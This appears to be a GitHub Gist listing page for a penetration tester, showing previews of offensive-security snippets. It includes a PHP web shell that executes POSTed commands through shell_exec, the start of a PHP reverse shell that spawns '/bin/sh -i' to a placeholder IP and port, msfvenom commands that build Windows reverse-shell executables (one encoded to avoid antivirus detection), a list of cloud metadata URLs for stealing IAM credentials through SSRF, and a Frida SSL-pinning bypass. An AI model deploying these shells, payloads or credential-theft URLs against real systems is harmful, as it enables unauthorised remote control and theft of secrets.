Skip to content

Instantly share code, notes, and snippets.

View thevillagehacker's full-sized avatar
🎯
Focusing

Naveen Jagadeesan thevillagehacker

🎯
Focusing
83 followers · 1 following
View GitHub Profile
@thevillagehacker
thevillagehacker / PHP_Web_Shell.php
Created September 1, 2021 11:42
PHP Web Shell
<?php
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<!-- By Artyum (https://github.com/artyuum) -->
<head>
<meta charset="utf-8">
@thevillagehacker
thevillagehacker / Android-pentest.md
Last active February 8, 2025 04:11
Android Penetration Testing Resources
@thevillagehacker
thevillagehacker / cloud_metadata.txt
Created April 16, 2021 06:27 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@thevillagehacker
thevillagehacker / Android_pen-testing.md
Created March 23, 2021 06:00
@thevillagehacker
thevillagehacker / ssl-pinning-bypass.js
Created March 4, 2021 04:46
/*
Android SSL Re-pinning frida script v0.2 030417-pier
$ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt
$ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause
https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/
UPDATE 20191605: Fixed undeclared var. Thanks to @oleavr and @ehsanpc9999 !
*/
@thevillagehacker
thevillagehacker / Metasploit-cheatsheet.md
Created February 26, 2021 08:48
Metasploit cheatsheet

Metasploit Revershell CheatSheet

Msfvenom: 
msfvenom -p windows/shell_reverse_tcp LHOST=<your ip> LPORT=<your port> -f exe -o shell_reverse.exe

To avoid AV detection, use encryption

msfvenom -p windows/shell_reverse_tcp LHOST=<your ip> LPORT=<your port> -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
@thevillagehacker
thevillagehacker / bash_colors.sh
Last active November 10, 2023 06:15
# Reset
Color_Off="\[\033[0m\]" # Text Reset
# Regular Colors
Black="\[\033[0;30m\]" # Black
Red="\[\033[0;31m\]" # Red
Green="\[\033[0;32m\]" # Green
Yellow="\[\033[0;33m\]" # Yellow
Blue="\[\033[0;34m\]" # Blue
Purple="\[\033[0;35m\]" # Purple
@thevillagehacker
thevillagehacker / Powny_shell.php
Created February 7, 2021 06:38
<?php
function featureShell($cmd, $cwd) {
$stdout = array();
if (preg_match("/^\s*cd\s*$/", $cmd)) {
// pass
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
chdir($cwd);
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
@thevillagehacker
thevillagehacker / php_reverseshell.php
Created February 7, 2021 06:37
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'IP'; // CHANGE THIS
$port = PORT; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
@thevillagehacker
thevillagehacker / asp_lowercase.txt
Created February 3, 2021 06:16
This file has been truncated, but you can view the full file.
sound/pci/cs46xx/imgs/cwcdma.asp
sites/all/libraries/ckeditor/ckeditor.asp
sites/all/libraries/ckeditor/_samples/asp/events.asp
sites/all/libraries/ckeditor/_samples/asp/sample_posteddata.asp
sites/all/libraries/ckeditor/_samples/asp/standalone.asp
sites/all/libraries/ckeditor/_samples/asp/replaceall.asp
sites/all/libraries/ckeditor/_samples/asp/advanced.asp
sites/all/libraries/ckeditor/_samples/asp/replace.asp
src/main/webapp/static/my97datepicker/docs/demo/resource/main.asp
library/custom_template/ckeditor/_samples/asp/replaceall.asp